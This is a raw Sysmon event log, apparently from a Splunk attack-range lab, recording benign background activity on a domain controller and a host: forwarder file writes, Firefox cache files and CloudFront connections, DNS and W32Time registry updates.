AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000223554Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:22.085{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7DD9682293BE9DB4616E03EACA2E767,SHA256=3ED9464236B317DC4B7104DE0ABEBC07D0CC36DC7579FC10FF6880F925E36365,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299818Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:20.830{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49655-false13.32.121.102server-13-32-121-102.fra60.r.cloudfront.net443https 354300x8000000000000000299817Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:20.830{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49656-false13.32.121.102server-13-32-121-102.fra60.r.cloudfront.net443https 354300x8000000000000000299816Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:20.829{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49654-false13.32.121.102server-13-32-121-102.fra60.r.cloudfront.net443https 354300x8000000000000000299815Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:20.829{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49653-false13.32.121.102server-13-32-121-102.fra60.r.cloudfront.net443https 354300x8000000000000000299814Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:20.829{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49652-false13.32.121.102server-13-32-121-102.fra60.r.cloudfront.net443https 354300x8000000000000000299813Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:20.829{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49651-false13.32.121.102server-13-32-121-102.fra60.r.cloudfront.net443https 354300x8000000000000000299812Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:20.822{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local59393- 354300x8000000000000000299811Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:20.771{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49650-false18.66.139.28server-18-66-139-28.fra60.r.cloudfront.net443https 354300x8000000000000000299810Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:20.771{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49649-false18.66.139.28server-18-66-139-28.fra60.r.cloudfront.net443https 354300x8000000000000000299809Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:20.771{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49648-false18.66.139.28server-18-66-139-28.fra60.r.cloudfront.net443https 354300x8000000000000000299808Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:20.771{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49647-false18.66.139.28server-18-66-139-28.fra60.r.cloudfront.net443https 354300x8000000000000000299807Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:20.771{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49646-false18.66.139.28server-18-66-139-28.fra60.r.cloudfront.net443https 354300x8000000000000000299806Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:20.768{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49645-false18.66.139.28server-18-66-139-28.fra60.r.cloudfront.net443https 23542300x8000000000000000299805Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:22.292{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\cache2\indexMD5=43419F88895119CAFAFC42BAF7A19A7C,SHA256=C7C9EB41371DF28BAA4919CFDD1311A02F5D47151B506ED6645730FA1288F2A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299804Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:22.235{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\cache2\doomed\6089MD5=D754BC89DECFB96623BB06A0BA07551B,SHA256=32B8B508C9613BCF619E1BE5AEFB3E4A4346EC94A075A1E6EAC6791F349798BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299803Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:22.212{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\cache2\doomed\3384MD5=5DD213FF9609A3038F2B4E79216A1641,SHA256=5C0DC29FA5F2DAD08F26E1DE139BB93A4A9ACFB9531E4ECC38161798F3394FCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299802Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:22.205{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\cache2\doomed\26468MD5=DF207509775655119C2DFFF743CD0526,SHA256=C7B178E533B777A1C6DF5B50B68C9FAF647C5D7B5FF5350173CFD1B29C067C1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299801Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:22.177{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\cache2\doomed\23651MD5=DB7255688F6D115104D70A56EFF50E55,SHA256=DCC50FE16DC7305DCDA0DD2A5469F855374E2124B6883061F8806025F94B8348,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299800Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:20.140{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49644-false18.66.139.67server-18-66-139-67.fra60.r.cloudfront.net443https 354300x8000000000000000299799Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.875{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49643-false18.66.139.28server-18-66-139-28.fra60.r.cloudfront.net443https 354300x8000000000000000299798Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:19.589{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49642-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299797Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:22.103{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\cache2\doomed\4394MD5=BFBFBB61D2FBD25CB012123ACBB36FAC,SHA256=C9E6D8194251F2069BCD8810D42B203F863A7B70DB667EB46A05862CE0239968,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299796Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:22.049{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\cache2\doomed\27590MD5=B9C4BAB47A56571E53D5B3D09077FA0F,SHA256=CBF7AF73B0BFFAD9C4411D573A9E110A9E8D062EBE24B3FCE74D4420597943E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223555Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:23.116{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=108DA246EB5937B6D9E3D980502C8B01,SHA256=529165D93C2A87DF8D357FF031933ABFADEA50A4033E0656DAB4866D3770A331,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299823Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:23.652{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\cache2\doomed\4944MD5=A0F7161C581E496414E29764766E34EB,SHA256=20987862A3CC6CEEB3081D2A1C56AD5F9B91D24F65514949E5B104DD934B500F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299822Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:23.650{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\cache2\doomed\23547MD5=03B8438C63BC4478CD590EE12C1123FA,SHA256=281E86DA8E78E93B4D9A129E36918BC53DC705E514CD2DF22C2E16366D6388D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299821Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:23.647{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\cache2\doomed\5289MD5=79ECD5B8EA382C4E64756953A388DC7F,SHA256=C358A8DC85594AE562C13E9C746087053BE3C149D87A683C1871C7370B186F04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299820Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:23.459{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=31C0E89F056A9C822B1DC37B79C861F5,SHA256=327B93FB9998028F4AFEFA061818E5F617CE0B1323C28712B146EF6986E9F547,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299819Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:23.008{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48072CC61E046F1DDFEB221DBFA4E0FA,SHA256=D1C78C81C3B6150A370E2DA6C2385044671CED52E50855DBE23F3E7CDB3DBBD4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223556Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:24.131{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D039100DC3F84EB9E6A02CFBD5A0FEC5,SHA256=3DC737689CEDC78DDBA8BD38B30C47C7E2D5BBCD5C91B3E8C91A2434A98958B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299824Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:24.014{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CADA5B59A98889C87F5F6159B62CAAA4,SHA256=44A5B631C2008AD45C5A64D5CFCE0ABEE6D540CA28F1F7CC0531DF4AB6247015,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223557Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:25.255{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85D96BB00EA0440D0F5545CC958D3485,SHA256=360FC121D11A404517BD54BEB5BA1BEA83652CA30C4CF852EAFBF70A82BD851A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299825Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:25.019{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=718E665102AEC048ADB32EED4DEEB182,SHA256=852B917427FDFA391BCACF764300EC9354ECDA21F76FDDADBEFE435E6DA36ACF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223559Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:24.511{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51796-false10.0.1.12-8000- 23542300x8000000000000000223558Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:26.474{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E43CB4316FCA9D56D2896F096EB02968,SHA256=B0B661DF5B7E470130D248106B640AFE3261482156877F6A1967E6651786E5D4,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000299836Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:29:26.764{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000299835Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:29:26.764{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00a21bd1) 13241300x8000000000000000299834Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:29:26.764{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d828a0-0x3b68dbd9) 13241300x8000000000000000299833Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:29:26.764{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d828a8-0x9d2d43d9) 13241300x8000000000000000299832Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:29:26.764{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d828b0-0xfef1abd9) 13241300x8000000000000000299831Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:29:26.764{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000299830Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:29:26.764{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00a21bd1) 13241300x8000000000000000299829Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:29:26.764{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d828a0-0x3b68dbd9) 13241300x8000000000000000299828Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:29:26.764{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d828a8-0x9d2d43d9) 13241300x8000000000000000299827Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:29:26.764{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d828b0-0xfef1abd9) 23542300x8000000000000000299826Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:26.058{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D352937F91CDACBDAD42E052E2222DD,SHA256=4E36EC96A763B10BD6B90D77E7CCD48A8CA1BB0002080505209433188D5227FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223560Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:27.536{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39FCEDB88045B244EB3F01D03F601BF2,SHA256=7E9B93C3705FB3016A3C2A3B67F62004269E6FC84F85F281317E2592D649396F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299838Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:24.710{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49657-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299837Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:27.107{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=965A53B0E2AFBC62EB3BE647CB00B30A,SHA256=7EA502821EE000E03D9C7E51B1C45DDBB029B88F0B758FD4FE5150CE4922755C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223561Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:28.583{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BD0F6049D0B7318D16C861F0126C8BD,SHA256=691EFA1F14E9A78ED5BC353F94D2D21907397808BCDF90CE1A480EE042BD1CBF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299839Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:28.110{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B20098925E44BE4CB6272A7D3176DF6A,SHA256=4A0AE117311789E75EB00ABED5746ACECE9E4BC84CFC95B703748A783B52F81F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223562Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:29.630{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36769FEC3D709AE71613497471A2920B,SHA256=3948E9203A2D25138BE99C99F3EED35F6E40C76BBC8B6A654C410BC63538A676,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299840Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:29.124{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E15A83A9DD7123A62B9BA637D140F2B9,SHA256=103D751BAA0D9049584EB89BC0A4C512E29BBDC6F3C4757A2F4FC8AED86EA2B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223564Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:30.645{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3B4600DA48FF3D57A6B5DF922727FE4,SHA256=455E2B7E1C551BB98DFFAB599E93DD308E6A544A0BAA79C72201A0F1B2AE1A4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299841Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:30.125{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B375DB1123CDE71663190432F12421F0,SHA256=818C5C7C8D189E56F5A297BF31F01CD6F12E4C936A878E2F2E1180D64EDB6D9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223563Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:30.520{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=BD812DCC5C7EF209CFA3DDE3C0E74721,SHA256=3E1360EE3FFD90371C5EEC6E815BA0526F6395BED0F6C8B5254B78C2837DA555,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223566Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:31.879{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B18D680879042CC9506154956FFDD29C,SHA256=469007435B0C7328151FC897482437B4ECC873CB47D25D61D8C013F83FF608B0,IMPHASH=00000000000000000000000000000000falsetrue 